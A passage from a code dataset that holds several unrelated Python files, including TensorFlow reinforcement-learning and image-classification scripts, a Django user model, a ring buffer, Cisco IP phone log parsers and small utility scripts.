tf.reduce_mean(neg_log_prob * discounted_episode_rewards_)\n\n with tf.name_scope(\"train\"):\n train_opt = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n\n\n# Set up Tensorboard\nwriter = tf.summary.FileWriter(\"/tmp/tensorboard/pg/1\")\ntf.summary.scalar(\"Loss\", loss)\ntf.summary.scalar(\"Reward_mean\", 
mean_reward_)\nwrite_op = tf.summary.merge_all()\n\n\n# Train the agent\n# For each step:\n# choose an action a\n# perform action a\n# store s, a, r\n# if done:\n# calculate sum reward\n# calculate gamma Gt\n# optimize\nallRewards = []\ntotal_rewards = 0\nmaximumRewardRecorded = 0\nepisode = 0\nepisode_states, episode_actions, episode_rewards = [], [], []\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for episode in range(max_episodes):\n \n episode_rewards_sum = 0\n\n # Launch the game!\n state = env.reset()\n\n env.render()\n\n while True:\n\n # Choose action a\n action_probability_distribution = sess.run(action_distribution, feed_dict={input_: state.reshape([1,4])})\n\n action = np.random.choice(range(action_probability_distribution.shape[1]), p=action_probability_distribution.ravel())\n\n # Perform a\n new_state, reward, done, info = env.step(action)\n\n # Store s, a, r\n episode_states.append(state)\n\n action_ = np.zeros(action_size)\n action_[action] = 1\n\n episode_actions.append(action_)\n\n episode_rewards.append(reward)\n\n if done:\n # Calculate the sum reward\n episode_rewards_sum = np.sum(episode_rewards)\n\n allRewards.append(episode_rewards_sum)\n\n total_rewards = np.sum(allRewards)\n\n # Calculate the mean reward, as well\n mean_reward = np.divide(total_rewards, episode+1)\n\n maximumRewardRecorded = np.amax(allRewards)\n\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~\")\n print(\"Episode: \", episode)\n print(\"Reward: \", episode_rewards_sum)\n print(\"Mean Reward: \", mean_reward)\n print(\"Max reward so far: \", maximumRewardRecorded)\n\n # Calculate discounted reward\n discounted_episode_rewards = discount_and_normalize_rewards(episode_rewards)\n\n # Feedforward, gradient, and backpropagation\n loss_, _ = sess.run(\n [loss, train_opt],\n feed_dict={\n input_: np.vstack(np.array(episode_states)),\n actions: np.vstack(np.array(episode_actions)),\n discounted_episode_rewards_: discounted_episode_rewards\n }\n )\n\n # Write TF summaries\n summary = sess.run(\n write_op,\n feed_dict={\n input_: np.vstack(np.array(episode_states)),\n actions: np.vstack(np.array(episode_actions)),\n discounted_episode_rewards_: discounted_episode_rewards,\n mean_reward_: mean_reward\n }\n )\n\n writer.add_summary(summary, episode)\n writer.flush()\n\n # Reset the transition stores\n episode_states, episode_actions, episode_rewards = [], [], []\n\n break\n\n state = new_state\n","sub_path":"cartpole_main.py","file_name":"cartpole_main.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"32903586","text":"import networkx as nx\nimport random\n\n\ndef display_graph(graph, width):\n i = 0\n for node in graph.nodes(data=True):\n if i % width == 0:\n print ('\\n')\n print(node, end='\\t')\n i += 1\n\n\ndef generate_graph(height=5, width=5):\n graph = nx.grid_2d_graph(height, width, periodic=False, create_using=None)\n # set random values for all the nodes\n for _, data in graph.nodes(data=True):\n data[\"value\"] = random.randint(1, 20)\n\n return graph\n","sub_path":"local_search/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"219850394","text":"from django.db import models\nfrom django.contrib.auth.models import PermissionsMixin\nfrom django.contrib.auth.base_user import AbstractBaseUser\nfrom django.utils.translation import gettext as _\nfrom 
user.managers import UserManager\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n email = models.EmailField(_(\"email\"), unique=True)\n username = models.CharField(_(\"username\"), max_length=50, primary_key=True)\n data_joined = models.DateTimeField(_(\"data_joined\"), auto_now_add=True)\n is_active = models.BooleanField(_(\"is_active\"), default=True)\n is_staff = models.BooleanField(_(\"is_staff\"), default=True)\n\n objects = UserManager()\n USERNAME_FIELD = \"username\"\n REQUIRED_FIELDS = [\"email\", ]\n\n class Meta:\n verbose_name = _(\"username\")\n verbose_name_plural = _(\"usernames\")\n\n def get_name(self):\n return self.username.strip()\n","sub_path":"translate-me/authentication-master/api/user/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"518664602","text":"class RingBuffer:\n def __init__(self, capacity):\n self.capacity = capacity\n self.current = 0\n self.storage = [None]*capacity\n\n def append(self, item):\n # check if there is space in the storage\n if None in self.storage:\n # get the index of None\n emptyIndex = self.storage.index(None)\n self.storage[emptyIndex] = item\n # if storage is full\n else:\n # get the first element as the oldest\n oldestItem = self.storage[0]\n for i in self.storage:\n # getting the oldest element in the array\n if i < oldestItem:\n oldestItem = i\n # get the oldest item index\n oldestItemIndex = self.storage.index(oldestItem)\n # override item with the oldest\n self.storage[oldestItemIndex] = item\n\n def get(self):\n return [item for item in self.storage if item != None]\n","sub_path":"ring_buffer/ring_buffer.py","file_name":"ring_buffer.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"276483793","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport cv2\nimport matplotlib.pyplot as plt\nimport pickle\nimport numpy as np\n\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ndef get_data_and_label(file):\n dict = unpickle(file)\n data = dict[b'data']\n label = dict[b'labels']\n print(type(data))\n print(type(label))\n # data = data.reshape([-1,3,32,32])\n label = np.array(label,dtype = np.uint8)\n return data,label\n\ndef classification_model_fn(features,labels,mode):\n # Input data and label\n # Suppose the data format is NHWC\n input_data = tf.reshape(features[\"x\"],[-1,32,32,3])\n input_data = tf.cast(input_data,tf.float32)\n print(input_data.shape)\n labels = tf.cast(labels, tf.int32)\n # Convolutional Layer #1\n conv1 = tf.layers.conv2d(inputs=input_data,\n filters = 32,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv1.shape)\n BN = tf.layers.batch_normalization(conv1)\n pool1 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2) \n # Convolutional Layer #2\n conv2 = tf.layers.conv2d(inputs=pool1,\n filters = 64,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv2.shape)\n BN = tf.layers.batch_normalization(conv2)\n pool2 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n # Convolutional Layer #3\n conv3 = tf.layers.conv2d(inputs=pool2,\n filters = 128,\n kernel_size = [3,3],\n padding=\"same\",\n 
activation=tf.nn.leaky_relu)\n print(conv3.shape)\n BN = tf.layers.batch_normalization(conv3)\n # Convolutional Layer #4\n conv4 = tf.layers.conv2d(inputs=BN,\n filters = 64,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv4.shape)\n BN = tf.layers.batch_normalization(conv4)\n # Convolutional Layer #5\n conv5 = tf.layers.conv2d(inputs=BN,\n filters = 128,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv5.shape)\n BN = tf.layers.batch_normalization(conv5)\n pool3 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n\n # Convolutional Layer #6\n conv6 = tf.layers.conv2d(inputs=pool3,\n filters = 256,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv6.shape)\n BN = tf.layers.batch_normalization(conv6)\n # Convolutional Layer #7\n conv7 = tf.layers.conv2d(inputs=BN,\n filters = 128,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv7.shape)\n BN = tf.layers.batch_normalization(conv7)\n # Convolutional Layer #8\n conv8 = tf.layers.conv2d(inputs=BN,\n filters = 256,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv8.shape)\n BN = tf.layers.batch_normalization(conv8)\n pool4 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n\n # Convolutional Layer #9\n conv9 = tf.layers.conv2d(inputs=pool4,\n filters = 512,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv9.shape)\n BN = tf.layers.batch_normalization(conv9)\n # Convolutional Layer #10\n conv10 = tf.layers.conv2d(inputs=BN,\n filters = 256,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv10.shape)\n BN = tf.layers.batch_normalization(conv10)\n # Convolutional Layer #11\n conv11 = tf.layers.conv2d(inputs=BN,\n filters = 512,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv11.shape)\n BN = tf.layers.batch_normalization(conv11)\n # Convolutional Layer #12\n conv12 = tf.layers.conv2d(inputs=BN,\n filters = 256,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv12.shape)\n BN = tf.layers.batch_normalization(conv12)\n # Convolutional Layer #13\n conv13 = tf.layers.conv2d(inputs=pool4,\n filters = 512,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv13.shape)\n BN = tf.layers.batch_normalization(conv13)\n pool5 = tf.layers.max_pooling2d(inputs = BN, pool_size = [2,2], strides = 2)\n\n # Convolutional Layer #14\n conv14 = tf.layers.conv2d(inputs=pool5,\n filters = 1024,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv14.shape)\n BN = tf.layers.batch_normalization(conv14)\n # Convolutional Layer #15\n conv15 = tf.layers.conv2d(inputs=BN,\n filters = 512,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv15.shape)\n BN = tf.layers.batch_normalization(conv15)\n # Convolutional Layer #16\n conv16 = tf.layers.conv2d(inputs=BN,\n filters = 1024,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv16.shape)\n BN = tf.layers.batch_normalization(conv16)\n # Convolutional Layer #17\n conv17 = tf.layers.conv2d(inputs=BN,\n filters = 512,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv17.shape)\n BN = tf.layers.batch_normalization(conv17)\n # Convolutional Layer #18\n conv18 = tf.layers.conv2d(inputs=BN,\n filters = 
1024,\n kernel_size = [3,3],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv18.shape)\n BN = tf.layers.batch_normalization(conv18)\n \n # Convolutional Layer #19\n conv19 = tf.layers.conv2d(inputs=BN,\n filters = 1000,\n kernel_size = [1,1],\n padding=\"same\",\n activation=tf.nn.leaky_relu)\n print(conv19.shape)\n\n avgpool = tf.layers.average_pooling2d(conv19,pool_size = [7,7],strides = 1)\n # Dense Layer\n avgpool_flat = tf.reshape(avgpool, [-1, 7 * 7 * 1000])\n dense = tf.layers.dense(inputs=avgpool_flat, units=1000, activation=tf.nn.softmax)\n dropout = tf.layers.dropout(\n inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)\n\n # Logits Layer\n logits = tf.layers.dense(inputs=dropout, units=10)\n\n predictions = {\n # Generate predictions (for PREDICT and EVAL mode)\n \"classes\": tf.argmax(input=logits, axis=1),\n # Add `softmax_tensor` to the graph. It is used for PREDICT and by the\n # `logging_hook`.\n \"probabilities\": tf.nn.softmax(logits, name=\"softmax_tensor\")\n }\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # Calculate Loss (for both TRAIN and EVAL modes)\n loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)\n\n # Configure the Training Op (for TRAIN mode)\n if mode == tf.estimator.ModeKeys.TRAIN:\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)\n train_op = optimizer.minimize(\n loss=loss,\n global_step=tf.train.get_global_step())\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n # Add evaluation metrics (for EVAL mode)\n eval_metric_ops = {\n \"accuracy\": tf.metrics.accuracy(\n labels=labels, predictions=predictions[\"classes\"])}\n return tf.estimator.EstimatorSpec(\n mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\ndef main(unused_argv):\n # Load training and eval data\n # mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n file1 = \"cifar-10-batches-py/data_batch_1\"\n train_data,train_labels = get_data_and_label(file1)\n file2 = \"cifar-10-batches-py/data_batch_2\"\n eval_data,eval_labels = get_data_and_label(file2)\n # Create the Estimator\n yolo_classifier = tf.estimator.Estimator(\n model_fn=classification_model_fn, model_dir=\"tmp/yolo_convnet_model\")\n # Set up logging for predictions\n tensors_to_log = {\"probabilities\": \"softmax_tensor\"}\n logging_hook = tf.train.LoggingTensorHook(\n tensors=tensors_to_log, every_n_iter=50)\n # Train the model\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\":train_data},\n y=train_labels,\n batch_size=64,\n num_epochs=160,\n shuffle=True)\n yolo_classifier.train(\n input_fn=train_input_fn,\n steps=20000,\n hooks=[logging_hook])\n # Evaluate the model and print results\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\":eval_data},\n y=eval_labels,\n num_epochs=1,\n shuffle=False)\n eval_results = yolo_classifier.evaluate(input_fn=eval_input_fn)\n print(eval_results)\n\n\nif __name__ == '__main__':\n # file = \"C:\\\\Users\\\\DengDazhen\\\\Desktop\\\\test\\\\cifar-10-batches-py\\\\data_batch_1\"\n # data,label = get_data_and_label(file)\n #transform the input array to a 32*32*3 matrix\n # data = data.reshape([-1,3,32,32])\n # dataset = tf.data.Dataset.from_tensor_slices({'image':data,'label':label})\n # iterator = dataset.make_one_shot_iterator()\n # one_element = iterator.get_next()\n # with tf.Session() as sess:\n # for i in range(5):\n # print(sess.run(one_element))\n tf.app.run()\n\n 
\n\n\n","sub_path":"YOLO_l.py","file_name":"YOLO_l.py","file_ext":"py","file_size_in_byte":9543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"401673668","text":"import re\n\nport_counters = [\n 'RxalignErr',\n 'RxcrcErr',\n 'RxlongErr',\n 'RxshortErr',\n 'RxtokenDrop',\n 'Txcollisions',\n 'TxexcessDefer',\n 'TxexcessLength',\n 'TxlateCollision',\n]\n\n# 78/88 debug display:\n# [8:54:12am 08/20/19] DeviceTLInfo ... ReasonForOutOfServiceText=...\n# 8821 has space after seconds\n# [5:48:09 AM 10/11/19] DeviceName=SEP007686CF681A ... ReasonForOutOfServiceText=...\ndebug_rgx_default = re.compile(\n r'\\d{1,2}:\\d{1,2}:\\d{1,2}\\s*\\w{2},?\\s*'\n r'(?P\\d{2}/\\d{2}/\\d{2}).+'\n r'ReasonForOutOfServiceText=(?P\\w+)',\n re.I,\n)\n\n# 79xx debug display (does not include date:\n# 12:02:55a 25: Name=SEPB8BEBF227D79 Load= 9.4(2SR3.1S) Last=Initialized\ndebug_rgx_79xx = re.compile(\n r'(?P\\d{1,2}:\\d{1,2}:\\d{1,2}\\w).+'\n r'Last=(?P.+)$',\n re.I,\n )\n\n# 78/88 status messages:\n# [8:52:30am 10/01/19] ITL installed\nstatus_rgx_default = re.compile(\n r'\\d{1,2}:\\d{1,2}:\\d{1,2}\\s*\\w{2},?\\s*'\n r'(?P\\d{2}/\\d{2}/\\d{2})\\]\\s*'\n r'(?P.+)',\n re.I,\n)\n\n# 79xx debug display (does not include date:\n# 1:33:26a TFTP Error : SEPB8BEBF9D2061.cnf.xml.sgn\nstatus_rgx_79xx = re.compile(\n r'(?P\\d{1,2}:\\d{1,2}:\\d{1,2}\\w)\\s*'\n r'(?P.+)$',\n re.I,\n )\n\ndebug_display_rgx = [debug_rgx_default, debug_rgx_79xx]\nstatus_messages_rgx = [status_rgx_default, status_rgx_79xx]\n\n\ndef multi_match(text_list, rgx_list, cnt):\n \"\"\"\n Collected lines that match regex's in the rgx_list until the # of collected\n lines equals cnt.\n\n Args:\n text_list (list): List of strings to match\n rgx_list (list): One or more regex's\n cnt (int): Number of matches to collect before returning\n\n Returns:\n (str): The matched lines joined by linefeed/CR\n \"\"\"\n matches = []\n for line in text_list:\n line = re.sub(r'\\n', ' ', line)\n for rgx in rgx_list:\n m = rgx.search(line)\n if m:\n matches.append(' '.join(m.groups()))\n break\n\n if len(matches) >= cnt:\n break\n return '\\n\\r'.join(matches)\n\n\ndef prep_xml(func):\n \n def wrapper(xml_dict, count=1):\n \"\"\"\n Take the OrderedDict returned from the Status message or Debug display web page\n and strip out the status messages for further processing.\n\n These pages both return the following data structures:\n If multiple messages exist:\n {'DeviceLog': { 'status' [ 'msg1', 'msg2']}}\n If a single (or no) message exists:\n {'DeviceLog': { 'status' 'msg'}}\n\n The value of the inner 'status' key is taken and, if necessary converted to a list. \n The list is then reversed so the most recent entries are first. 
\n\n Args:\n xml_dict (OrderedDict): Converted XML from IP phone web page\n count (int): Number of results to return \n \n Returns:\n status_messages (list): Reversed list of status message entries\n \"\"\"\n device_log = xml_dict.get('DeviceLog') or {}\n status_messages = device_log.get('status') or []\n\n # status_messages will be a list unless only one status message exists on the page\n # in which case it will be a string\n if isinstance(status_messages, str):\n status_messages = [status_messages]\n\n status_messages.reverse()\n return func(status_messages, count)\n return wrapper\n\n\n@prep_xml\ndef parse_status_error(status_messages, count):\n \"\"\"\n Parse Status message web page for the most recent error messages.\n\n Lines are matched based on the err_rgx.\n\n The most recent X matches are returned where X is the value of count.\n\n Args:\n status_messages (list): Lines from the Status message web page\n count (int): Number of matches to return\n\n Returns:\n (str): One or more matched lines joined by CR/LF\n \"\"\"\n err_rgx = re.compile(r'(no trust list|error|configmismatch|tftp timeout)', re.I)\n matched = []\n for msg in status_messages:\n if err_rgx.search(msg):\n matched.append(msg)\n\n return multi_match(matched, status_messages_rgx, count)\n\n\n@prep_xml\ndef parse_status_itl(status_messages, count):\n \"\"\"\n Parse Status message web page for the most recent ITL-related entries.\n\n Matched lines contain \"ITL\" or \"Trust\". These may be errors or informational.\n\n The most recent X matches are returned where X is the value of count.\n\n Args:\n status_messages (list): Lines from the Status message web page\n count (int): Number of matches to return\n\n Returns:\n (str): One or more matched lines joined by CR/LF\n \"\"\"\n itl_rgx = re.compile(r'(ITL|Trust)')\n matched = []\n for msg in status_messages:\n if itl_rgx.search(msg, re.I):\n matched.append(msg)\n\n return multi_match(matched, status_messages_rgx, count)\n\n\n@prep_xml\ndef parse_debug_reason(debug_messages, count=1):\n \"\"\"\n Parse Debug display page content for the most recent out of service reasons.\n\n Values are pulled from \"ReasonForOutOfServiceText=TEXT\" lines. 
The date and TEXT\n are extracted from the line and returned.\n\n The most recent X matches are returned where X is the value of count.\n\n Args:\n debug_messages (list): Lines from the Debug display web page\n count (int): Number of matches to return\n\n Returns:\n (str): One or more matched lines joined by CR/LF\n \"\"\"\n return multi_match(debug_messages, debug_display_rgx, count)\n\n\ndef parse_port_errors(port_dict):\n \"\"\"\n Parse PortInformation web pages and sum all the error counters into a single value.\n\n Args:\n port_dict (OrderedDict): Converted XML from IP phone web page\n\n Returns:\n val: (int): Sum of error counters\n \"\"\"\n port_info = port_dict.get('PortInformation') or {}\n val = 0\n for k in port_counters:\n try:\n val += int(port_info.get(k, 0))\n except (TypeError, KeyError):\n pass\n return val\n\n\ndef parse_pc_port_speed(port_dict):\n \"\"\"\n Parse Access network page content for PC port speed/duplex.\n\n Return 'N/A' if PortSpeed key is not present under the assumption that\n the source device does not have a PC port.\n\n Args:\n port_dict (OrderedDict): Converted XML from IP phone web page\n\n Returns:\n (str): PortSpeed value or 'N/A\n \"\"\"\n port_info = port_dict.get('PortInformation') or {}\n return port_info.get('PortSpeed', 'N/A')\n","sub_path":"field_funcs.py","file_name":"field_funcs.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"320103664","text":"import sys\nimport os\n\nimport numpy as np\nimport scipy.stats\n\n\ndef mean_confidence_interval(data, confidence=0.95):\n a = 1.0 * np.array(data)\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, h\n\n\ndef read_results(dataset):\n fn = '%s_result.txt' % dataset\n\n methods = ['phrase model score',\n 'marker model score',\n 'IR-based',\n 'AB method 0',\n 'AB method 1',\n 'AB method 2',\n 'AB method 3',\n 'Opine - marker, score',\n 'Opine - marker, running time',\n 'Opine - histogram, score',\n 'Opine - histogram, running time']\n scores = { method : [] for method in methods}\n for line in open(fn):\n line = line.strip()\n score_id = None\n for method in methods:\n if line.startswith(method):\n score_id = method\n break\n\n if score_id != None:\n token = ''\n if '\\t' in line:\n token = line.split('\\t')[-1]\n elif ' ' in line:\n token = line.split(' ')[-1]\n scores[method].append(float(token))\n\n # table 1\n columns = []\n for difficulty in range(3):\n column = []\n N = len(scores['IR-based'])\n\n ir_based = [scores['IR-based'][i] for i in range(N) if i % 3 == difficulty]\n column.append(mean_confidence_interval(ir_based))\n for ab_mode in range(4):\n attr_name = 'AB method %d' % ab_mode\n score = [scores[attr_name][i] for i in range(N) if i % 3 == difficulty]\n column.append(mean_confidence_interval(score))\n opine = [scores['Opine - marker, score'][i] \\\n for i in range(N) if i % 3 == difficulty]\n column.append(mean_confidence_interval(opine))\n columns.append(column)\n\n print('Table 1 dataset %s' % dataset)\n max_conf_int = 0.0\n for i in range(6):\n row = '\\t'.join(['%.3f' % columns[j][i][0] for j in range(3)])\n max_conf_int = max(max_conf_int, max([columns[j][i][1] for j in range(3)]))\n print(row)\n print('max_conf_int =', max_conf_int)\n\n # table 2\n column = []\n LR_accuracy = mean_confidence_interval(scores['marker model score'])\n NDCG_10 = mean_confidence_interval(scores['Opine - marker, score'])\n runtime1 = 
mean_confidence_interval(scores['Opine - marker, running time'])\n column += [LR_accuracy, NDCG_10, runtime1]\n LR_accuracy = mean_confidence_interval(scores['phrase model score'])\n NDCG_10 = mean_confidence_interval(scores['Opine - histogram, score'])\n runtime2 = mean_confidence_interval(scores['Opine - histogram, running time'])\n column += [LR_accuracy, NDCG_10, runtime2]\n speedup = [b / a for (a, b) in zip(scores['Opine - marker, running time'],\n scores['Opine - histogram, running time'])]\n column.append(mean_confidence_interval(speedup))\n\n print('Table 2 dataset %s' % dataset)\n for i in range(7):\n print('%.2f %.3f' % (column[i][0], column[i][1]))\n print('avg. runtime - marker =', np.mean(scores['Opine - marker, running time']) / 100)\n print('avg. runtime - histogram =', np.mean(scores['Opine - histogram, running time']) / 100)\n\n\nif __name__ == '__main__':\n datasets = ['london', 'amsterdam', 'toronto_lp', 'toronto_jp']\n\n for dataset in datasets:\n read_results(dataset)\n","sub_path":"eval/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"182734005","text":"#ID25.py\n\n#This program finds the first fibonacci number with 1000 digits\n\ndef ID25():\n numdig = int(input('What is the number of digits? '))\n x = 1\n a = 0\n b = 0\n length = 0\n fibnum = 1\n while length < numdig:\n b = x\n x += a\n a = b\n tlength = len(str(x))\n if tlength > length:\n length = tlength\n fibnum += 1\n print('The number is ', fibnum)\n\nID25()\n","sub_path":"python files/id25.py","file_name":"id25.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"34562143","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.e_introduction, name='e_introduction'),\n path('introduction/edit//', views.introduction_edit, name='e_introduction_edit'),\n path('teams//', views.e_teams, name='e_teams'),\n path('subcategory//', views.e_subcategory, name='e_subcategory'),\n path('services//', views.e_services, name='e_services'),\n]","sub_path":"kilwoo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"543442737","text":"\nlista_cosas = [\"das\", 123, 456, \"fsdskhg\", 796, \"36464230a\", \"sfsd\", 723746245]\nlista_numeros = []\nlista_str = []\n\n\n\nfor dato in lista_cosas:\n if type(dato) == str:\n lista_str.append(dato)\n elif type(dato) == int:\n lista_numeros.append(dato)\n\n\nprint(lista_str)\nprint(lista_numeros)\n","sub_path":"ejercicios/lista_con_str_int.py","file_name":"lista_con_str_int.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"37201272","text":"from keras.models import Model,Sequential\nfrom keras.layers import Embedding,LSTM,Dense,Average,Input\n#from gensim.models import KeyedVectors\n\n#word_vectors = KeyedVectors.load_word2vec_format('./embeddings/low_shuff_combine_tokenized.txt-iter17-min5.bin', binary=True)\n\nmodel_input = Input(shape=(None,))\nfixed = word_vectors.get_keras_embedding(train_embeddings=False)(model_input)\nfree = word_vectors.get_keras_embedding(train_embeddings=True)(model_input)\ncombined = Average()([free,fixed])\n\nlstm = LSTM(args.value,\n activation='tanh', # activation function used\n recurrent_activation='hard_sigmoid', # activation function for recurrent step\n use_bias=True, # whether the layer uses a bias vector\n kernel_initializer='glorot_uniform', # initialiser for the weights matrix\n recurrent_initializer='orthogonal', # initialiser for the recurrent kernal's weights\n bias_initializer='zeros', # initialiser for the bias vector\n unit_forget_bias=True, # add 1 to the bias of the forget gate at initialization\n kernel_regularizer=None, # regularizer function applied to kernal\n recurrent_regularizer=None, # regularizer function applied to recurrent kernal\n bias_regularizer=None, # regularizer function applied to bias vector\n activity_regularizer=None, # regularizer function applied to output of the layer\n kernel_constraint=None, # constraint function applied to the kernal\n recurrent_constraint=None, # constraint function applied to the recurrent kernal\n bias_constraint=None, # constraint function applied to the bias vector\n dropout=0.0, # fraction of units to drop for the linear transformation of the inputs\n recurrent_dropout=0.0, # fraction of units to drop for the linear transformation of the recurrent state\n implementation=1, # implementation mode, either 1 or 2.\n return_sequences=False,\n return_state=False,\n go_backwards=False,\n stateful=False, # If True, the last state for each sample at index i in a batch will be used as initial state for the sample of index i in the following batch.\n unroll=False)(combined)\noutput = Dense(2,\n activation='softmax',\n use_bias=True,\n kernel_initializer='glorot_uniform',\n bias_initializer='zeros',\n kernel_regularizer=None,\n bias_regularizer=None,\n activity_regularizer=None,\n kernel_constraint=None,\n bias_constraint=None)(lstm)\n\nmodel = Model(inputs=[model_input], outputs=[output])\n\nmodel.compile(optimizer='Adadelta',\n 
loss='binary_crossentropy',\n metrics=['acc'],\n sample_weight_mode=None,\n weighted_metrics=None,\n target_tensors=None)\n\n#from keras.utils import plot_model\n#plot_model(model,show_shapes=True, show_layer_names=False, to_file='model2.png')\n","sub_path":"models/lstm_single_embedDual.py","file_name":"lstm_single_embedDual.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"653298701","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport os\nimport peewee\nfrom playhouse.shortcuts import model_to_dict\n\n\ndatabase_path = '/home/rrocha/projects/feagri/ebbandflow.db'\ndatabase = peewee.SqliteDatabase(database_path)\n\n\nclass BaseModel(peewee.Model):\n class Meta:\n database = database\n\n def to_dict(self, datefield_format='%d/%m/%Y'):\n dict_model = model_to_dict(self)\n\n for key, value in dict_model.items():\n if isinstance(value, datetime.date):\n new_value = value.strftime(datefield_format)\n dict_model[key] = new_value\n\n return dict_model\n\n\nclass StatusPlanta(BaseModel): \n status_bomba = peewee.CharField()\n modo_operacao = peewee.CharField()\n umidade_set_point = peewee.CharField()\n intervalo_leitura = peewee.CharField()\n umidade_substrato = peewee.CharField()\n ph_solucao = peewee.CharField()\n ph_set_point = peewee.CharField()\n created_date = peewee.DateTimeField(default=datetime.datetime.now)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"533190466","text":"import datetime\r\nbefore1 = input(\"開始日(YYYY/MM/DD) :\")\r\nafter1 = datetime.datetime.strptime(before1, '%Y/%m/%d')\r\nbefore2 = input(\"終了日(YYYY/MM/DD) :\")\r\nafter2 = datetime.datetime.strptime(before2, '%Y/%m/%d')\r\n\r\n\r\nout = after2-after1\r\nprint(\"日数差: {0} 日\".format(out.days))\r\n\r\n","sub_path":"python実験/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"411050607","text":"def hth_anno():\n f=open(\"./data/domian_in_neighbour.tbl\").read().split(\"\\n\")\n f=f[3:-11]\n query2accession={}\n for i in f:\n i_info=i.split()\n query=i_info[2]\n accession=i_info[1]\n if query not in query2accession.keys():\n query2accession[query]=[accession]\n else:\n query2accession[query].append(accession)\n geneWithHth=list(query2accession.keys())\n \n #f=open(\"./data/del\").read().split(\"\\n\")\n f=open(\"./data/neighbour.log_1\").read().split(\"\\n\")\n f.remove(\"\")\n target2neighbour={}\n t2n={}\n for i in f:\n i_info=i.split(\":\")\n key=i_info[0]\n value=eval(i_info[1])\n tmp=[]\n for j in value:\n if j in geneWithHth:\n j_strand=\"dsadasdsa\"\n tmp.append(j_strand)\n if tmp:\n target2neighbour[key]=\"1\"\n 